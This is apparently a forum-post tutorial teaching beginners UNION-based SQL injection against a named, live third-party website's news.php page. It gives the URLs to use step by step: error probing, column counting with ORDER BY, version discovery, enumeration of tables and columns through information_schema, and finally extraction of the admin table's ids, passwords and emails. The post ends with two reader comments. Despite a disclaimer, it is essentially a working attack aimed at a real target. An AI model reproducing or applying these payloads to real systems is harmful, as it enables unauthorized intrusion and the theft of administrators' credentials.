Best sql hacking tutorials I have ever.
Best sql hacking tutorials i have ever read for noobs or newbies.
Hope you find it useful.
I am not reponsible for any misuse of this document.
This website shown is legit vulnerable,i am not advising you to hack it but im making you aware the website exists and is vulnerable to this.
Code:
http://www.swidwin.mns.pl/news.php?id=-17′
add ‘ to the end to check if its vulnerable
it gets error,i know its vulnerable so i remove the ‘ and do
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 1–
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 2–
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 3–
No errors i continue etc etc
i finally get an error when i do like below
Code:
http://www.swidwin.mns.pl/news.php?id=17 order by 13–
so this tells me 13 columns dont exist,so there must be 12 columns in the database
so next i do the UNION SELECT function as shown below
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12–
(note make sure to add a – in between = 17 like =-17 in the ID)
i Hit enter
Numbers 4 and 5 appear,this means data can be extracted from numbers for and five
I Replace 4 in the url with @@version so it now looks like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12–
The i hit enter
5.0.32-Debian_7etch8-log
^this is the mysql version running,So its running version 5 that helps alot,(versions 4 and below we have the guess the table name’s)
Now
Where we put @@version (4th spot)
Replace it with
group_concat(table_name) <<gets table name
like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12–
And at the end of union select string remove the — after the 12 and add
+from+information_schema.tables+where+table_schema =database()–
So it now looks like
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()–
i Now see
x_admins,x_articles,x_ban,x_banners,x_banners_info ,x_comments,x_file_categories, ? x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook, x_infopages,x_links_categories ? ,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_ poll_desc,x_pw,x_topic,x_users ?
Now replace group_Concat(table_name) with group_concat(column_name) and everything after union select 5,6,7,8,9,10,11,12 with
+from+information_schema.columns+where+table_name= ‘x_admins’–
so it goes from
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()–
TO
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name=’x_admins’–
we see id,nick,pass,name,added,access,mail,stat
Learn about grouping at this point but now we add
group_concat(id,0×3a,pass,0×3a,mail) to were the group_concat(column_name) is and add +from+x_admins– after 10,11,12
So the string becomes
Code:
http://www.swidwin.mns.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0×3a,pass,0×3a,mail),5,6,7,8,9,10,11,12 +from+x_admins–
At this point we obtain the admins password
2 Responses
Very informative article
how do you remember all this stuff, you blinding us with science.